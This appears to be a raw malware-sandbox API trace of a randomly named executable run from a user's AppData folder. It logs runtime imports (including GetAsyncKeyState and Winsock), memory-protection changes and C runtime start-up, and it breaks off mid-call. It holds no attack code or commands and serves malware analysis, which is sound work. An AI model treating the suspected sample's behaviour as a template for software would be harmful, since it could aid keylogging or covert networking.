0x74f65041 [0175.662] GetProcAddress (hModule=0x74f40000, lpProcName="GetWindowPlacement") returned 0x74f62aca [0175.662] GetProcAddress (hModule=0x74f40000, lpProcName="GetWindowTextA") returned 0x74f60029 [0175.662] GetProcAddress (hModule=0x74f40000, lpProcName="GetMenuItemRect") returned 0x74fb82ef [0175.662] GetProcAddress (hModule=0x74f40000, lpProcName="TrackPopupMenuEx") returned 0x74f7c2ac [0175.662] GetProcAddress (hModule=0x74f40000, lpProcName="GetAsyncKeyState") returned 0x74f7eb96 [0175.662] GetProcAddress (hModule=0x74f40000, lpProcName="SetRect") returned 0x74f60e1b [0175.662] GetProcAddress (hModule=0x74f40000, lpProcName="SetWindowLongA") returned 0x74f66110 [0175.662] GetProcAddress (hModule=0x74f40000, lpProcName="MessageBoxA") returned 0x74fafd1e [0175.663] GetProcAddress (hModule=0x74f40000, lpProcName="UnionRect") returned 0x74f626a8 [0175.663] GetProcAddress (hModule=0x74f40000, lpProcName="BringWindowToTop") returned 0x74f67b3b [0175.663] GetProcAddress (hModule=0x74f40000, lpProcName="CharLowerA") returned 0x74f63e75 [0175.663] GetProcAddress (hModule=0x74f40000, lpProcName="GetWindowLongA") returned 0x74f5d156 [0175.663] GetProcAddress (hModule=0x74f40000, lpProcName="CreateWindowExA") returned 0x74f5d22e [0175.663] GetProcAddress (hModule=0x74f40000, lpProcName="ReleaseDC") returned 0x74f57446 [0175.663] GetProcAddress (hModule=0x74f40000, lpProcName="SetClassLongA") returned 0x74f6d5f9 [0175.663] GetProcAddress (hModule=0x74f40000, lpProcName="GetDlgItem") returned 0x74f7f1ba [0175.663] GetProcAddress (hModule=0x74f40000, lpProcName="EndDialog") returned 0x74f7b99c [0175.663] GetProcAddress (hModule=0x74f40000, lpProcName="DefWindowProcA") returned 0x771724e0 [0175.663] GetProcAddress (hModule=0x74f40000, lpProcName="SetWindowPos") returned 0x74f58e4e [0175.663] GetProcAddress (hModule=0x74f40000, lpProcName="GetCursorPos") returned 0x74f61218 [0175.664] GetProcAddress (hModule=0x74f40000, lpProcName="GetMenuItemInfoA") returned 0x74f673a1 [0175.664] GetProcAddress (hModule=0x74f40000, lpProcName="AppendMenuA") returned 0x74fb67fb [0175.664] GetProcAddress (hModule=0x74f40000, lpProcName="GetMenuItemCount") returned 0x74f6563b [0175.664] GetProcAddress (hModule=0x74f40000, lpProcName="ReleaseCapture") returned 0x74f7ed49 [0175.664] GetProcAddress (hModule=0x74f40000, lpProcName="InsertMenuA") returned 0x74fb67b8 [0175.664] GetProcAddress (hModule=0x74f40000, lpProcName="SetWindowTextA") returned 0x74f67aee [0175.664] GetProcAddress (hModule=0x74f40000, lpProcName="SendMessageW") returned 0x74f59679 [0175.664] GetProcAddress (hModule=0x74f40000, lpProcName="UpdateWindow") returned 0x74f63559 [0175.664] GetProcAddress (hModule=0x74f40000, lpProcName="CallWindowProcA") returned 0x74f6792f [0175.664] GetProcAddress (hModule=0x74f40000, lpProcName="FindWindowA") returned 0x74f5ffe6 [0175.664] LoadLibraryA (lpLibFileName="WINTRUST.dll") returned 0x74de0000 [0175.665] GetProcAddress (hModule=0x74de0000, lpProcName="CryptCATGetMemberInfo") returned 0x74deec94 [0175.665] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0175.665] GetProcAddress (hModule=0x75bc0000, lpProcName=0x73) returned 0x75bc3ab2 [0175.665] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0175.665] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0175.665] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xeb9ac150, dwHighDateTime=0x1d59514)) [0175.665] GetCurrentProcessId () returned 0x5b8 [0175.666] GetCurrentThreadId () returned 0x7ec [0175.666] GetTickCount () returned 0x11646d1 [0175.666] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=29588814482) returned 1 [0175.666] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x40c433)) [0175.666] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0175.666] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x3840000 [0175.666] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0175.666] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0175.666] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0175.666] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0175.667] GetProcAddress (hModule=0x76c20000, lpProcName="FlsFree") returned 0x76c3359f [0175.667] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x214) returned 0x38407d0 [0175.667] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0175.667] GetCurrentThreadId () returned 0x7ec [0175.668] GetStartupInfoW (in: lpStartupInfo=0x18febc | out: lpStartupInfo=0x18febc*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40b04e, hStdOutput=0x40b387, hStdError=0x38407d0)) [0175.668] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x800) returned 0x38409f0 [0175.668] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0175.668] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0175.668] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0175.668] SetHandleCount (uNumber=0x20) returned 0x20 [0175.668] GetCommandLineA () returned="\"C:/Users/5p5NrGJn0jS HALPmcxz/AppData/Roaming/gtjtdfe\"" [0175.668] GetEnvironmentStringsW () returned 0x1d4dd50* [0175.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0175.668] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x565) returned 0x38411f8 [0175.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x38411f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0175.668] FreeEnvironmentStringsW (penv=0x1d4dd50) returned 1 [0175.668] GetLastError () returned 0x0 [0175.668] SetLastError (dwErrCode=0x0) [0175.668] GetLastError () returned 0x0 [0175.668] SetLastError (dwErrCode=0x0) [0175.668] GetLastError () returned 0x0 [0175.668] SetLastError (dwErrCode=0x0) [0175.668] GetACP () returned 0x4e4 [0175.668] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x220) returned 0x3841768 [0175.668] GetLastError () returned 0x0 [0175.669] SetLastError (dwErrCode=0x0) [0175.669] IsValidCodePage (CodePage=0x4e4) returned 1 [0175.669] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0175.669] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0175.669] GetLastError () returned 0x0 [0175.669] SetLastError (dwErrCode=0x0) [0175.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0175.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0175.669] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0175.669] GetLastError () returned 0x0 [0175.669] SetLastError (dwErrCode=0x0) [0175.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0175.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ獏ぉʪAĀ") returned 256 [0175.669] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ獏ぉʪAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0175.669] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ獏ぉʪAĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0175.669] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ=\x94à\x08\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0175.669] GetLastError () returned 0x0 [0175.669] SetLastError (dwErrCode=0x0) [0175.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0175.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ獏ぉʪAĀ") returned 256 [0175.669] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ獏ぉʪAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0175.669] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ獏ぉʪAĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0175.669] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ=\x94à\x08\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0175.669] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x420c28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gtjtdfe")) returned 0x35 [0175.669] GetLastError () returned 0x0 [0175.670] SetLastError (dwErrCode=0x0) [0175.670] GetLastError () returned 0x0 [0175.670] SetLastError (dwErrCode=0x0) [0175.670] GetLastError () returned 0x0 [0175.670] SetLastError (dwErrCode=0x0) [0175.670] GetLastError () returned 0x0 [0175.670] SetLastError (dwErrCode=0x0) [0175.670] GetLastError () returned 0x0 [0175.670] SetLastError (dwErrCode=0x0) [0175.670] GetLastError () returned 0x0 [0175.670] SetLastError (dwErrCode=0x0) [0175.670] GetLastError () returned 0x0 [0175.670] SetLastError (dwErrCode=0x0) [0175.670] GetLastError () returned 0x0 [0175.670] SetLastError (dwErrCode=0x0) [0175.670] GetLastError () returned 0x0 [0175.670] SetLastError (dwErrCode=0x0) [0175.670] GetLastError () returned 0x0 [0175.670] SetLastError (dwErrCode=0x0) [0175.670] GetLastError () returned 0x0 [0175.670] SetLastError (dwErrCode=0x0) [0175.670] GetLastError () returned 0x0 [0175.670] SetLastError (dwErrCode=0x0) [0175.670] GetLastError () returned 0x0 [0175.670] SetLastError (dwErrCode=0x0) [0175.670] GetLastError () returned 0x0 [0175.671] SetLastError (dwErrCode=0x0) [0175.671] GetLastError () returned 0x0 [0175.671] SetLastError (dwErrCode=0x0) [0175.671] GetLastError () returned 0x0 [0175.671] SetLastError (dwErrCode=0x0) [0175.671] GetLastError () returned 0x0 [0175.671] SetLastError (dwErrCode=0x0) [0175.671] GetLastError () returned 0x0 [0175.671] SetLastError (dwErrCode=0x0) [0175.671] GetLastError () returned 0x0 [0175.671] SetLastError (dwErrCode=0x0) [0175.671] GetLastError () returned 0x0 [0175.671] SetLastError (dwErrCode=0x0) [0175.671] GetLastError () returned 0x0 [0175.671] SetLastError (dwErrCode=0x0) [0175.671] GetLastError () returned 0x0 [0175.671] SetLastError (dwErrCode=0x0) [0175.671] GetLastError () returned 0x0 [0175.671] SetLastError (dwErrCode=0x0) [0175.671] GetLastError () returned 0x0 [0175.671] SetLastError (dwErrCode=0x0) [0175.671] GetLastError () returned 0x0 [0175.671] SetLastError (dwErrCode=0x0) [0175.671] GetLastError () returned 0x0 [0175.672] SetLastError (dwErrCode=0x0) [0175.672] GetLastError () returned 0x0 [0175.672] SetLastError (dwErrCode=0x0) [0175.672] GetLastError () returned 0x0 [0175.672] SetLastError (dwErrCode=0x0) [0175.672] GetLastError () returned 0x0 [0175.672] SetLastError (dwErrCode=0x0) [0175.672] GetLastError () returned 0x0 [0175.672] SetLastError (dwErrCode=0x0) [0175.672] GetLastError () returned 0x0 [0175.672] SetLastError (dwErrCode=0x0) [0175.672] GetLastError () returned 0x0 [0175.672] SetLastError (dwErrCode=0x0) [0175.672] GetLastError () returned 0x0 [0175.672] SetLastError (dwErrCode=0x0) [0175.672] GetLastError () returned 0x0 [0175.672] SetLastError (dwErrCode=0x0) [0175.672] GetLastError () returned 0x0 [0175.672] SetLastError (dwErrCode=0x0) [0175.672] GetLastError () returned 0x0 [0175.672] SetLastError (dwErrCode=0x0) [0175.672] GetLastError () returned 0x0 [0175.673] SetLastError (dwErrCode=0x0) [0175.673] GetLastError () returned 0x0 [0175.673] SetLastError (dwErrCode=0x0) [0175.673] GetLastError () returned 0x0 [0175.673] SetLastError (dwErrCode=0x0) [0175.673] GetLastError () returned 0x0 [0175.673] SetLastError (dwErrCode=0x0) [0175.673] GetLastError () returned 0x0 [0175.673] SetLastError (dwErrCode=0x0) [0175.673] GetLastError () returned 0x0 [0175.673] SetLastError (dwErrCode=0x0) [0175.673] GetLastError () returned 0x0 [0175.673] SetLastError (dwErrCode=0x0) [0175.673] GetLastError () returned 0x0 [0175.673] SetLastError (dwErrCode=0x0) [0175.673] GetLastError () returned 0x0 [0175.673] SetLastError (dwErrCode=0x0) [0175.673] GetLastError () returned 0x0 [0175.673] SetLastError 